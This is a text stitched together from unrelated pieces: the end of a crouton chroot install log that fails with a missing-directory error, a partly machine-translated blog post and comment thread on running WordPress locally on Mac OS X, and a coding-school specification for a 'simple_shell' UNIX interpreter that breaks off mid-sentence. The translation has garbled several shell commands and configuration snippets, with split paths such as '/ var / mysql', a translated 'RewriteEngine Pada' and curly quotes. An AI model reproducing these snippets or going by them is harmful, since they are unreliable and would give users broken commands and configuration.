2.4.32-1ubuntu1 I: Validating libdrm-nouveau1a 2.4.32-1ubuntu1 I: Retrieving libdrm-radeon1 2.4.32-1ubuntu1 I: Validating libdrm-radeon1 2.4.32-1ubuntu1 I: Retrieving libdrm2 2.4.32-1ubuntu1 I: Validating libdrm2 2.4.32-1ubuntu1 I: Retrieving libelf1 0.152-1ubuntu3 I: Validating libelf1 0.152-1ubuntu3 I: Retrieving libexpat1 2.0.1-7.2ubuntu1 I: Validating libexpat1 2.0.1-7.2ubuntu1 I: Retrieving libffi6 3.0.11~rc1-5 I: Validating libffi6 3.0.11~rc1-5 I: Retrieving libfribidi0 0.19.2-1 I: Validating libfribidi0 0.19.2-1 I: Retrieving libgcc1 1%3a4.6.3-1ubuntu5 I: Validating libgcc1 1%3a4.6.3-1ubuntu5 I: Retrieving libglib2.0-0 2.32.1-0ubuntu2 I: Validating libglib2.0-0 2.32.1-0ubuntu2 I: Retrieving libklibc 1.5.25-1ubuntu2 I: Validating libklibc 1.5.25-1ubuntu2 I: Retrieving liblocale-gettext-perl 1.05-7build1 I: Validating liblocale-gettext-perl 1.05-7build1 I: Retrieving liblockfile-bin 1.09-3 I: Validating liblockfile-bin 1.09-3 I: Retrieving liblockfile1 1.09-3 I: Validating liblockfile1 1.09-3 I: Retrieving liblzma5 5.1.1alpha+20110809-3 I: Validating liblzma5 5.1.1alpha+20110809-3 I: Retrieving libmagic1 5.09-2 I: Validating libmagic1 5.09-2 I: Retrieving libmount1 2.20.1-1ubuntu3 I: Validating libmount1 2.20.1-1ubuntu3 I: Retrieving libncurses5 5.9-4 I: Validating libncurses5 5.9-4 I: Retrieving libncursesw5 5.9-4 I: Validating libncursesw5 5.9-4 I: Retrieving libnewt0.52 0.52.11-2ubuntu10 I: Validating libnewt0.52 0.52.11-2ubuntu10 I: Retrieving libnih-dbus1 1.0.3-4ubuntu9 I: Validating libnih-dbus1 1.0.3-4ubuntu9 I: Retrieving libnih1 1.0.3-4ubuntu9 I: Validating libnih1 1.0.3-4ubuntu9 I: Retrieving libpam-modules 1.1.3-7ubuntu2 I: Validating libpam-modules 1.1.3-7ubuntu2 I: Retrieving libpam-modules-bin 1.1.3-7ubuntu2 I: Validating libpam-modules-bin 1.1.3-7ubuntu2 I: Retrieving libpam-runtime 1.1.3-7ubuntu2 I: Validating libpam-runtime 1.1.3-7ubuntu2 I: Retrieving libpam0g 1.1.3-7ubuntu2 I: Validating libpam0g 1.1.3-7ubuntu2 I: Retrieving libpciaccess0 0.12.902-1 I: Validating libpciaccess0 0.12.902-1 I: Retrieving libpcre3 8.12-4 I: Validating libpcre3 8.12-4 I: Retrieving libplymouth2 0.8.2-2ubuntu30 I: Validating libplymouth2 0.8.2-2ubuntu30 I: Retrieving libpng12-0 1.2.46-3ubuntu4 I: Validating libpng12-0 1.2.46-3ubuntu4 I: Retrieving libpopt0 1.16-3ubuntu1 I: Validating libpopt0 1.16-3ubuntu1 I: Retrieving libreadline6 6.2-8 I: Validating libreadline6 6.2-8 I: Retrieving libselinux1 2.1.0-4.1ubuntu1 I: Validating libselinux1 2.1.0-4.1ubuntu1 I: Retrieving libslang2 2.2.4-3ubuntu1 I: Validating libslang2 2.2.4-3ubuntu1 I: Retrieving libsqlite3-0 3.7.9-2ubuntu1 I: Validating libsqlite3-0 3.7.9-2ubuntu1 I: Retrieving libss2 1.42-1ubuntu2 I: Validating libss2 1.42-1ubuntu2 I: Retrieving libssl1.0.0 1.0.1-4ubuntu3 I: Validating libssl1.0.0 1.0.1-4ubuntu3 I: Retrieving libstdc++6 4.6.3-1ubuntu5 I: Validating libstdc++6 4.6.3-1ubuntu5 I: Retrieving libtext-charwidth-perl 0.04-7build1 I: Validating libtext-charwidth-perl 0.04-7build1 I: Retrieving libtext-iconv-perl 1.7-5 I: Validating libtext-iconv-perl 1.7-5 I: Retrieving libtext-wrapi18n-perl 0.06-7 I: Validating libtext-wrapi18n-perl 0.06-7 I: Retrieving libtinfo5 5.9-4 I: Validating libtinfo5 5.9-4 I: Retrieving libudev0 175-0ubuntu9 I: Validating libudev0 175-0ubuntu9 I: Retrieving libusb-0.1-4 2%3a0.1.12-20 I: Validating libusb-0.1-4 2%3a0.1.12-20 I: Retrieving libuuid1 2.20.1-1ubuntu3 I: Validating libuuid1 2.20.1-1ubuntu3 I: Retrieving locales 2.13+git20120306-3 I: Validating locales 2.13+git20120306-3 I: Retrieving lockfile-progs 0.1.16 I: Validating lockfile-progs 0.1.16 I: Retrieving login 1%3a4.1.4.2+svn3283-3ubuntu5 I: Validating login 1%3a4.1.4.2+svn3283-3ubuntu5 I: Retrieving logrotate 3.7.8-6ubuntu5 I: Validating logrotate 3.7.8-6ubuntu5 I: Retrieving lsb-base 4.0-0ubuntu20 I: Validating lsb-base 4.0-0ubuntu20 I: Retrieving lsb-release 4.0-0ubuntu20 I: Validating lsb-release 4.0-0ubuntu20 I: Retrieving makedev 2.3.1-89ubuntu2 I: Validating makedev 2.3.1-89ubuntu2 I: Retrieving mawk 1.3.3-17 I: Validating mawk 1.3.3-17 I: Retrieving mime-support 3.51-1ubuntu1 I: Validating mime-support 3.51-1ubuntu1 I: Retrieving module-init-tools 3.16-1ubuntu2 I: Validating module-init-tools 3.16-1ubuntu2 I: Retrieving mount 2.20.1-1ubuntu3 I: Validating mount 2.20.1-1ubuntu3 I: Retrieving mountall 2.36 I: Validating mountall 2.36 I: Retrieving multiarch-support 2.15-0ubuntu10 I: Validating multiarch-support 2.15-0ubuntu10 I: Retrieving ncurses-base 5.9-4 I: Validating ncurses-base 5.9-4 I: Retrieving ncurses-bin 5.9-4 I: Validating ncurses-bin 5.9-4 I: Retrieving net-tools 1.60-24.1ubuntu2 I: Validating net-tools 1.60-24.1ubuntu2 I: Retrieving netbase 4.47ubuntu1 I: Validating netbase 4.47ubuntu1 I: Retrieving netcat-openbsd 1.89-4ubuntu1 I: Validating netcat-openbsd 1.89-4ubuntu1 I: Retrieving ntpdate 1%3a4.2.6.p3+dfsg-1ubuntu3 I: Validating ntpdate 1%3a4.2.6.p3+dfsg-1ubuntu3 I: Retrieving passwd 1%3a4.1.4.2+svn3283-3ubuntu5 I: Validating passwd 1%3a4.1.4.2+svn3283-3ubuntu5 I: Retrieving perl-base 5.14.2-6ubuntu2 I: Validating perl-base 5.14.2-6ubuntu2 I: Retrieving plymouth 0.8.2-2ubuntu30 I: Validating plymouth 0.8.2-2ubuntu30 I: Retrieving procps 1%3a3.2.8-11ubuntu6 I: Validating procps 1%3a3.2.8-11ubuntu6 I: Retrieving python 2.7.3-0ubuntu2 I: Validating python 2.7.3-0ubuntu2 I: Retrieving python-minimal 2.7.3-0ubuntu2 I: Validating python-minimal 2.7.3-0ubuntu2 I: Retrieving python2.7 2.7.3-0ubuntu3 I: Validating python2.7 2.7.3-0ubuntu3 I: Retrieving python2.7-minimal 2.7.3-0ubuntu3 I: Validating python2.7-minimal 2.7.3-0ubuntu3 I: Retrieving readline-common 6.2-8 I: Validating readline-common 6.2-8 I: Retrieving resolvconf 1.63ubuntu11 I: Validating resolvconf 1.63ubuntu11 I: Retrieving rsyslog 5.8.6-1ubuntu8 I: Validating rsyslog 5.8.6-1ubuntu8 I: Retrieving sed 4.2.1-9 I: Validating sed 4.2.1-9 I: Retrieving sensible-utils 0.0.6ubuntu2 I: Validating sensible-utils 0.0.6ubuntu2 I: Retrieving sudo 1.8.3p1-1ubuntu3 I: Validating sudo 1.8.3p1-1ubuntu3 I: Retrieving sysv-rc 2.88dsf-13.10ubuntu11 I: Validating sysv-rc 2.88dsf-13.10ubuntu11 I: Retrieving sysvinit-utils 2.88dsf-13.10ubuntu11 I: Validating sysvinit-utils 2.88dsf-13.10ubuntu11 I: Retrieving tar 1.26-4ubuntu1 I: Validating tar 1.26-4ubuntu1 I: Retrieving tzdata 2012b-1 I: Validating tzdata 2012b-1 I: Retrieving ubuntu-keyring 2011.11.21 I: Validating ubuntu-keyring 2011.11.21 I: Retrieving ubuntu-minimal 1.267 I: Validating ubuntu-minimal 1.267 I: Retrieving ucf 3.0025+nmu2ubuntu1 I: Validating ucf 3.0025+nmu2ubuntu1 I: Retrieving udev 175-0ubuntu9 I: Validating udev 175-0ubuntu9 I: Retrieving upstart 1.5-0ubuntu5 I: Validating upstart 1.5-0ubuntu5 I: Retrieving ureadahead 0.100.0-12 I: Validating ureadahead 0.100.0-12 I: Retrieving util-linux 2.20.1-1ubuntu3 I: Validating util-linux 2.20.1-1ubuntu3 I: Retrieving vim-common 2%3a7.3.429-2ubuntu2 I: Validating vim-common 2%3a7.3.429-2ubuntu2 I: Retrieving vim-tiny 2%3a7.3.429-2ubuntu2 I: Validating vim-tiny 2%3a7.3.429-2ubuntu2 I: Retrieving whiptail 0.52.11-2ubuntu10 I: Validating whiptail 0.52.11-2ubuntu10 I: Retrieving xkb-data 2.5-1ubuntu1 I: Validating xkb-data 2.5-1ubuntu1 I: Retrieving xz-utils 5.1.1alpha+20110809-3 I: Validating xz-utils 5.1.1alpha+20110809-3 I: Retrieving zlib1g 1%3a1.2.3.4.dfsg-3ubuntu4 I: Validating zlib1g 1%3a1.2.3.4.dfsg-3ubuntu4 I: Chosen extractor for .deb packages: ar I: Extracting adduser... I: Extracting base-files... I: Extracting base-passwd... I: Extracting bash... I: Extracting bsdutils... I: Extracting busybox-initramfs... I: Extracting coreutils... I: Extracting cpio... I: Extracting dash... I: Extracting debconf... I: Extracting debianutils... I: Extracting diffutils... I: Extracting dpkg... I: Extracting e2fslibs... I: Extracting e2fsprogs... I: Extracting findutils... I: Extracting gcc-4.6-base... I: Extracting grep... I: Extracting gzip... I: Extracting hostname... I: Extracting ifupdown... I: Extracting initramfs-tools... I: Extracting initramfs-tools-bin... I: Extracting initscripts... I: Extracting insserv... I: Extracting iproute... I: Extracting klibc-utils... I: Extracting libacl1... I: Extracting libattr1... I: Extracting libblkid1... I: Extracting libbz2-1.0... I: Extracting libc-bin... I: Extracting libc6... I: Extracting libcomerr2... I: Extracting libdb5.1... I: Extracting libdbus-1-3... I: Extracting libdrm-intel1... I: Extracting libdrm-nouveau1a... I: Extracting libdrm-radeon1... I: Extracting libdrm2... I: Extracting libelf1... I: Extracting libffi6... I: Extracting libgcc1... I: Extracting libglib2.0-0... I: Extracting libklibc... I: Extracting liblzma5... I: Extracting libmount1... I: Extracting libncurses5... I: Extracting libncursesw5... I: Extracting libnih-dbus1... I: Extracting libnih1... I: Extracting libpam-modules... I: Extracting libpam-modules-bin... I: Extracting libpam-runtime... I: Extracting libpam0g... I: Extracting libpciaccess0... I: Extracting libpcre3... I: Extracting libplymouth2... I: Extracting libpng12-0... I: Extracting libselinux1... I: Extracting libslang2... I: Extracting libss2... I: Extracting libssl1.0.0... I: Extracting libtinfo5... I: Extracting libudev0... I: Extracting libuuid1... I: Extracting locales... I: Extracting login... I: Extracting lsb-base... I: Extracting makedev... I: Extracting mawk... I: Extracting module-init-tools... I: Extracting mount... I: Extracting mountall... I: Extracting multiarch-support... I: Extracting ncurses-base... I: Extracting ncurses-bin... I: Extracting passwd... I: Extracting perl-base... I: Extracting plymouth... I: Extracting procps... I: Extracting python-minimal... I: Extracting python2.7-minimal... I: Extracting sed... I: Extracting sensible-utils... I: Extracting sysv-rc... I: Extracting sysvinit-utils... I: Extracting tar... I: Extracting tzdata... I: Extracting udev... I: Extracting upstart... I: Extracting util-linux... I: Extracting xz-utils... I: Extracting zlib1g... Moving bootstrap files into the chroot... Preparing chroot environment... Installing croutonversion into the chroot... Installing host-dbus into the chroot... Installing host-x11 into the chroot... Installing pulseaudio-default.pa into the chroot... Installing brightness into the chroot... Installing croutoncycle into the chroot... Installing croutonpowerd into the chroot... Installing croutonxinitrc-wrapper into the chroot... Installing setres into the chroot... Installing xinit into the chroot... Installing xbindkeysrc.scm into the chroot... Installing xserverrc-x11 into the chroot... Installing xserverrc-local.example into the chroot... Installing startunity into the host... Installing startunity into the chroot... Installing gnome-session-wrapper into the chroot... Installing unity-indicator-launch into the chroot... Installing enter-chroot into the host... Installing delete-chroot into the host... Installing edit-chroot into the host... Installing mount-chroot into the host... Installing unmount-chroot into the host... Installing crash_reporter_wrapper into the host... /tmp/crouton.NCn/host-bin/enter-chroot: 258: cannot create /var/run/crouton/usr/local/chroots/precise/etc/crouton/name: Directory nonexistent Unmounting /usr/local/chroots/precise... chronos@localhost / $ sudo startunity No chroots found in /usr/local/chroots

Per Søderlind bagaimana caranya Menjalankan WordPress secara lokal di Mac OS X Lion, Mountain Lion, dan Mavericks Menjalankan WordPress secara lokal di Mac OS X Lion, Mountain Lion, dan Mavericks PER SØDERLIND26 AGUSTUS 2011 Apple dan WordPressIngin menjalankan WordPress di OSX? Saya ingin melakukannya untuk waktu yang lama dan akhirnya berhasil melakukannya. Multisite : Lihat catatan di bawah jika Anda berencana untuk menjalankan Jaringan WordPress (alias multisite) di Mac Anda. Baru : Berikut ini alternatifnya, lihat WordPress di Pow (termasuk "bagaimana cara menambahkan MySQL, PHP5.4.9 dan Ruby 1.9.3 ") Pembaruan: Mountain Lion dan Mavericks Berbagi Web di Mountain Lion dihapus dari System Preferences-> Sharing (tidak tahu mengapa), jadi untuk memulai server web, buka Terminal (atau iTerm ) dan masukkan: [shell light = "true"] $ sudo apachectl start [/ shell ] perintah utama apachectl adalah: start, stop, dan restart. Anda dapat mempelajari lebih lanjut tentang apachectl dengan memasukkan yang berikut di Terminal [shell light = "true"] $ man apachectl [/ shell] apachectl cukup ketika Anda perlu memulai, restart atau menghentikan server saat pengujian, tetapi jika Anda ingin server web untuk memulai secara otomatis setelah reboot, Anda harus mengaktifkan daemon peluncuran untuk server: [shell light = "true"] sudo defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool false [/ shell] Buat /var/mysql/mysql.sock jika tidak ada (atau ganti /var/mysql/mysql.sock dengan /tmp/mysql.sock lebih jauh di bawah) [shell light = "true"] $ sudo mkdir / var / mysql $ sudo ln -s/tmp/mysql.sock/var / mysql/mysql.sock [/ shell] Juga, Jika Anda mengikuti petunjuk di bawah sebelumnya dan meningkatkan Singa Anda ke Mountain Lion, Anda harus mengaktifkan kembali PHP: [shell light = "true"] $ sudo sh -c "grep php /etc/apache2/httpd.conf|grep LoadModule | cut -d '#' -f2> /etc/apache2/other/php5-loadmodule.conf" $ sudo cp -a /etc/php.ini.default /etc/php.ini $ sudo sh -c “cat >> /etc/php.ini << 'EOF' ;; ;; Kustomisasi pengguna di bawah ; ; Asli - memory_limit = 128M memory_limit = 196M ; Asli - post_max_size = 8M post_max_size = 200M ; Asli - upload_max_filesize = 2M upload_max_filesize = 100M ; Asli - default_socket_timeout = 60 default_socket_timeout = 600 ; Asli - max_execution_time = 30 max_execution_time = 300 ; Asli - max_input_time = 60 max_input_time = 600 ; Asli - display_errors = Mati display_errors = on ; Asli - display_startup_errors = Tidak aktif display_startup_errors = on ; Asli -; date.timezone = date.timezone = 'America / New_York' // Ubah ke zona waktu Anda: http://www.php.net/manual/en/timezones.php EOF ” $ sudo sh -c “cat >> /etc/php.ini <<‘EOF’ ; Original – ;include_path = “.:/php/includes” include_path = “.:/usr/lib/php/pear” EOF” $ sudo sed -i “” ‘s#/var/mysql/mysql.sock#/tmp/mysql.sock#g’ /etc/php.ini $ sudo apachectl restart [/shell] How I installed MAMP + WordPress 1 ) Installed Apache, MySQL and PHP on my Mac. I followed this excellent guide: OS X 10.7 Lion Development: Native MAMP with MySQL installer. Here’s the /Users/<username>/Sites/httpd-vhosts.conf I made: [xml] # # Use name-based virtual hosting. # NameVirtualHost *:80 # # Set up permissions for VirtualHosts in ~/Sites # <Directory “/Users/<username>/Sites”> Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny Allow from all </Directory> # For http://localhost in the OS X default location <VirtualHost _default_:80> ServerName localhost DocumentRoot /Library/WebServer/Documents </VirtualHost> # # VirtualHosts below # # wp.local <VirtualHost *:80> ServerName wp.local CustomLog “/Users/<username>/Sites/logs/wp.local-access_log” combined ErrorLog “/Users/<username>/Sites/logs/wp.local-error_log” DocumentRoot “/Users/<username>/Sites/wordpress” </VirtualHost> [/xml] 2) Installed WordPress in /Users/<username>/Sites/wordpress When I tried to install the first plugin, I got the dreaded FTP Connection Information required :/ Luckily, Google to the rescue, I found this fix to allow WordPress automatic plugin installation/update: A) Changed the owner and permissions for the entire WordPress installation, assuming you installed WordPress in /Users/<username>/Sites: [shell] $ cd /Users/<username>/Sites $ sudo chown -R :_www wordpress $ sudo chmod -R g+w wordpress [/shell] B) Added the following to /Users/<username>/Sites/wordpress/wp-config.php: [php light=”true”] define(‘FS_METHOD’, ‘direct’); [/php] How to create a WordPress multisite locally 1) Follow the instructions above, and create a separate database per multisite Easiest is to create a path-based (that is use sub-directories) multisite. My multisite virtual host looks like this: [xml] <VirtualHost *:80> ServerName mu.local CustomLog “/Users/<username>/Sites/logs/mu.local-access_log” combined ErrorLog “/Users/<username>/Sites/logs/mu.local-error_log” DocumentRoot “/Users/<username>/Sites/mu.local” </VirtualHost> [/xml] 2) When WordPress is up and running, follow steps 2 – 6 in the Create a Network guide. If you have any questions, please don’t hesitate to ask below. I’ll try to answer as soon as possible. Twitter Google+ Facebook LinkedIn Email Read Offline:Download PDFDownload ePubDownload mobiPrint INSTALLATIONMAC OS XMAMPMYSQLWORDPRESS PREVIOUS Upgraded to WordPress 3.2 and nothing worked (internal error …) NEXT Front-end editor in WordPress 3.3 is easy 30 Comments bananaaus You legend! MARCH 7, 2012 REPLY Jarratt Hello, I’m just setting up a local installation of WordPress on my Mac with OSX Lion. I’ve managed to install it but I can’t update any plugins, import my blog etc (I’m new to all this so flying blind so to speak). I have read something about changing my FTP permissions? I don’t really understand what the article above is saying, could you please give some further info for me? Thanks a lot, hopefully you can help! Jarratt APRIL 13, 2012 REPLY PerS You have to do the following: A) Changed the owner and permissions for the entire WordPress installation, assuming you installed WordPress in /Users/<username>/Sites: [code lang=”shell” light=”false”] $ cd /Users/<username>/Sites $ sudo chown -R :_www wordpress $ sudo chmod -R g+w wordpress [/code] B) Added the following to /Users/<username>/Sites/wordpress/wp-config.php: [php] define(‘FS_METHOD’, ‘direct’); [/php] APRIL 13, 2012 REPLY Jarratt Hi again, That’s great, all up an running now. Thanks a lot! APRIL 16, 2012 REPLY Nick So I am having a problem with permalinks after setting up my dev environment on OSX Lion. I have AllowOveride All in my httpd.conf and in my vhosts file as you show, mod_rewrite is enabled… Any ideas? Thanks! MAY 1, 2012 REPLY PerS Apakah .htaccess Anda dapat ditulisi oleh wordpress? Milik saya terlihat seperti ini (dan permalinks bekerja): [shell] # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine Pada RewriteBase / RewriteRule ^ index.php $ - [L] RewriteCond% {REQUEST_FILENAME}! -f RewriteCond% {REQUEST_FILENAME}! -d RewriteRule. /index.php [L] </ IfModule> # END WordPress [/ shell] 1 MEI 2012 BALASAN bla bla Sepertinya banyak masalah bagi saya, saya menggunakan mamp pro & coda, std mamp menginstal dan wordpress ke direktori wordpress di folder situs, tidak perlu untuk semua yang mengotak-atik hasil yang sama, oh dan semuanya bekerja seperti pada server langsung, email, permalinks, pembaruan untuk wordpress & plugin, .htaccess yang dapat ditulis dll 4 MEI 2012 BALASAN Bill Robbins Pembenci anonim menghisap. Jika Anda mengeluh cukup untuk meninggalkan sebagai komentar, setidaknya tunjukkan diri Anda. 26 JULI 2012 BALASAN chapman welch Terima kasih atas tipnya. Anda menyelamatkan saya beberapa jam rasa sakit dan penderitaan! 14 JUNI 2012 BALASAN Senica Terima kasih sudah mengirim. Membuatku gila. 9 AGUSTUS 2012 BALASAN Martyn Chamberlin Ini benar-benar luar biasa! Saya telah secara manual menginstal / memperbarui WordPress, kerangka kerja saya, dan plugin saya. Berkat tutorial ini, kerumitan jahat ini telah dikurangi menjadi beberapa klik sederhana. 29 AGUSTUS 2012 BALASAN PakPenyo solusi bagi saya adalah mengubah pengguna dan grup: sudo chown -R _www: _www wordpress Terima kasih. 12 OKTOBER 2012 BALASAN PerS Itu bagus, selama Anda adalah anggota grup _www, jika tidak Anda (seperti pada pengguna Anda) tidak dapat mengedit file. 12 OKTOBER 2012 BALASAN Yanns terima kasih banyak, namun ada pertanyaan .. haruskah saya peduli terhadap apa pun ketika saya memigrasikan situs lokal ke publik? Haruskah saya menghapus yang terakhir seperti dari wp-config.php? 27 JANUARI 2013 BALASAN PerS Saya menggunakan http://ithemes.com/purchase/backupbuddy/ ketika saya memindahkan situs dari localhost ke produksi. Itu melakukan perubahan yang diperlukan untuk wp-config.php 27 JANUARI 2013 BALASAN Yanns ya tetapi apakah menurut Anda membuat perubahan ke wp-config.php sudah cukup? Saya belum pernah melakukannya sebelumnya di WP tetapi saya pikir kita perlu memperbaiki hal-hal lain juga sebelum ditayangkan. Seperti tautan dll .. mungkin pertanyaan saya konyol tapi baiklah, saya akan mencengkeramnya sehari;) 27 JANUARI 2013 BALASAN Yanns ..dan apakah backupbuddy mengurus hak akses yang kami berikan dengan perintah di atas? Maksud saya untuk membuat mereka kembali normal. Saya tidak ingin ada masalah dengan hak akses ketika situs web online .. 27 JANUARI 2013 BALASAN Yanns di baris perintah saya (singa) itu mengatakan: -bash: Pengguna // Situs / pencarian / folder: Tidak ada file atau direktori seperti itu jalan hanyalah sebuah contoh. Saya mencoba mencari di mana jalan rusak, mencoba perintah $ cd dalam potongan kecil tetapi ada lagi masalah yang sama. apa yang harus saya lakukan? 27 JANUARI 2013 BALASAN PerS Anda harus mengganti <username> dalam contoh di atas dengan nama pengguna Anda. 27 JANUARI 2013 BALASAN Yanns Ya, saya telah melakukan itu. apa yang saya lakukan adalah untuk menggambarkan Anda jalan. Akhirnya, masalah itu disebabkan oleh hal konyol yang telah saya lakukan: Saya telah meletakkan spasi di nama file sehingga terminal tidak dapat menemukan folder .. Masalah lainnya adalah saya tidak menulis filepath yang benar. jadi saya mencarinya dan saya menemukan bahwa Anda dapat menulis 1-2 huruf pertama dari nama file Anda dan kemudian tekan Ctrl + tab (untuk mac itu sama, ex.Ctrl + tab, dan perintah + tab tidak akan berfungsi) . Setelah Anda melakukannya, terminal akan menulis nama file untuk Anda! .. Terakhir, masalah lain adalah bahwa saya sedang menulis ..sudo chown -R: _www wordpress Kesalahan saya: Saya harus menulis nama folder induk file. Saya pikir wordpress itu bagian dari perintah. Jadi yang benar adalah: sudo chown -R: _www exampleFilename (ofcourse juga berlaku untuk chmod) Cheers! 27 JANUARI 2013 BALASAN Aidan Boyle Luar biasa! Terima kasih telah memposting ini. Saya memiliki waktu dengan yang satu ini dan ini melakukan trik segera terima kasih! 21 MARET 2013 BALASAN Phil Dipasang WP tetapi memiliki probs ketika mengunggah media karena masalah perizinan. Diburu selama berabad-abad untuk mencari solusi. Situs Anda menyortirnya segera. Tepuk tangan. 8 APRIL 2013 BALASAN PerS Adian dan Phil, Senang aku dapat membantu. Tolong beritahu orang lain menggunakan twitter dll. 8 APRIL 2013 BALASAN Babass Halo, saya memiliki kesalahan saat pemasangan plugin. Sebelum masalah akses ditolak folder, saya memiliki pesan kesalahan baru: “Paket tidak dapat dipasang. PCLZIP_ERR_BAD_FORMAT (-10): Tidak dapat menemukan tanda End of Central Dir Record " Apa artinya? terimakasih atas bantuannya 12 APRIL 2013 BALASAN PerS Ini biasanya berarti bahwa arsip plugin tidak dapat diekstraksi karena terlalu sedikit ruang disk, tetapi mungkin juga karena ini: http://core.trac.wordpress.org/ticket/22913 14 APRIL 2013 BALASAN Babass Terima kasih atas balasan Anda, ini masalah format. Saya mengunggah file zip, dan sekarang berfungsi. 18 APRIL 2013 BALASAN steve Anda harus memasang plugin secara lokal hanya dengan mengubah grup ke _www untuk wp-content dan menambahkan izin menulis ke grup, lalu menambahkan define ('FS_METHOD', 'direct'); baris ke wp-config Anda. 9 JUNI 2014 BALASAN Jarod Taylor Setelah mengubah izin, direktori direktori localhost / ~ username saya tidak ditemukan. 28 NOVEMBER 2014 BALASAN Per Søderlind Apakah ini di Mac OS X Yosemite? Saya berhenti menggunakan apache lokal, saya menggunakan https://github.com/Chassis/Chassis sebagai gantinya.

Write a beautiful code that passes the Betty checks Repo: GitHub repository: simple_shell 1. Simple shell 0.1 mandatory Write a UNIX command line interpreter. Usage: simple_shell Your Shell should: Display a prompt and wait for the user to type a command. A command line always ends with a new line. The prompt is displayed again each time a command has been executed. The command lines are simple, no semicolons, no pipes, no redirections or any other advanced features. The command lines are made only of one word. No arguments will be passed to programs. If an executable cannot be found, print an error message and display the prompt again. Handle errors. You have to handle the “end of file” condition (Ctrl+D) You don’t have to: use the PATH implement built-ins handle special characters : ", ', `, \, *, &, # be able to move the cursor handle commands with arguments julien@ubuntu:~/shell$ ./shell #cisfun$ ls ./shell: No such file or directory #cisfun$ /bin/ls barbie_j env-main.c exec.c fork.c pid.c ppid.c prompt prompt.c shell.c stat.c wait env-environ.c exec fork mypid ppid printenv promptc shell stat test_scripting.sh wait.c #cisfun$ /bin/ls -l ./shell: No such file or directory #cisfun$ ^[[D^[[D^[[D ./shell: No such file or directory #cisfun$ ^[[C^[[C^[[C^[[C ./shell: No such file or directory #cisfun$ exit ./shell: No such file or directory #cisfun$ ^C julien@ubuntu:~/shell$ echo "/bin/ls" | ./shell #cisfun$ barbie_j env-main.c exec.c fork.c pid.c ppid.c prompt prompt.c shell.c stat.c wait env-environ.c exec fork mypid ppid printenv promptc shell stat test_scripting.sh wait.c #cisfun$ julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 2. Simple shell 0.2 mandatory Simple shell 0.1 + Handle command lines with arguments Repo: GitHub repository: simple_shell 3. Simple shell 0.3 mandatory Simple shell 0.2 + Handle the PATH fork must not be called if the command doesn’t exist julien@ubuntu:~/shell$ ./shell_0.3 :) /bin/ls barbie_j env-main.c exec.c fork.c pid.c ppid.c prompt prompt.c shell_0.3 stat test_scripting.sh wait.c env-environ.c exec fork mypid ppid printenv promptc shell shell.c stat.c wait :) ls barbie_j env-main.c exec.c fork.c pid.c ppid.c prompt prompt.c shell_0.3 stat test_scripting.sh wait.c env-environ.c exec fork mypid ppid printenv promptc shell shell.c stat.c wait :) ls -l /tmp total 20 -rw------- 1 julien julien 0 Dec 5 12:09 config-err-aAMZrR drwx------ 3 root root 4096 Dec 5 12:09 systemd-private-062a0eca7f2a44349733e78cb4abdff4-colord.service-V7DUzr drwx------ 3 root root 4096 Dec 5 12:09 systemd-private-062a0eca7f2a44349733e78cb4abdff4-rtkit-daemon.service-ANGvoV drwx------ 3 root root 4096 Dec 5 12:07 systemd-private-062a0eca7f2a44349733e78cb4abdff4-systemd-timesyncd.service-CdXUtH -rw-rw-r-- 1 julien julien 0 Dec 5 12:09 unity_support_test.0 :) ^C julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 4. Simple shell 0.4 mandatory Simple shell 0.3 + Implement the exit built-in, that exits the shell Usage: exit You don’t have to handle any argument to the built-in exit Repo: GitHub repository: simple_shell 5. Simple shell 1.0 mandatory Simple shell 0.4 + Implement the env built-in, that prints the current environment julien@ubuntu:~/shell$ ./simple_shell $ env USER=julien LANGUAGE=en_US SESSION=ubuntu COMPIZ_CONFIG_PROFILE=ubuntu SHLVL=1 HOME=/home/julien C_IS=Fun_:) DESKTOP_SESSION=ubuntu LOGNAME=julien TERM=xterm-256color PATH=/home/julien/bin:/home/julien/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin DISPLAY=:0 $ exit julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 6. Simple shell 0.1.1 #advanced Simple shell 0.1 + Write your own getline function Use a buffer to read many chars at once and call the least possible the read system call You will need to use static variables You are not allowed to use getline You don’t have to: be able to move the cursor Repo: GitHub repository: simple_shell 7. Simple shell 0.2.1 #advanced Simple shell 0.2 + You are not allowed to use strtok Repo: GitHub repository: simple_shell 8. Simple shell 0.4.1 #advanced Simple shell 0.4 + handle arguments for the built-in exit Usage: exit status, where status is an integer used to exit the shell julien@ubuntu:~/shell$ ./shell_0.4.1 $ exit 98 julien@ubuntu:~/shell$ echo $? 98 julien@ubuntu:~/shell$ Repo: GitHub repository: simple_shell 9. setenv, unsetenv #advanced Simple shell 1.0 + Implement the setenv and unsetenv builtin commands setenv Initialize a new environment variable, or modify an existing one Command syntax: setenv VARIABLE VALUE Should print something on stderr on failure unsetenv Remove an environment variable Command syntax: unsetenv VARIABLE Should print something on stderr on failure Repo: GitHub repository: simple_shell 10. cd #advanced Simple shell 1.0 + Implement the builtin command cd: Changes the current directory of the process. Command syntax: cd [DIRECTORY] If no argument is given to cd the command must be interpreted like cd $HOME You have to handle the command cd - You have to update the environment variable PWD when you change directory man chdir, man getcwd Repo: GitHub repository: simple_shell 11. ; #advanced Simple shell 1.0 + Handle the commands separator ; alex@~$ ls /var ; ls /var backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /hbtn ; ls /var ls: cannot access /hbtn: No such file or directory backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /var ; ls /hbtn backups cache crash lib local lock log mail metrics opt run spool tmp ls: cannot access /hbtn: No such file or directory alex@~$ ls /var ; ls /hbtn ; ls /var ; ls /var backups cache crash lib local lock log mail metrics opt run spool tmp ls: cannot access /hbtn: No such file or directory backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ Repo: GitHub repository: simple_shell 12. && and || #advanced Simple shell 1.0 + Handle the && and || shell logical operators alex@~$ ls /var && ls /var backups cache crash lib local lock log mail metrics opt run spool tmp backups cache crash lib local lock log mail metrics opt run spool tmp alex@~$ ls /hbtn && ls /var ls: cannot access /hbtn: No 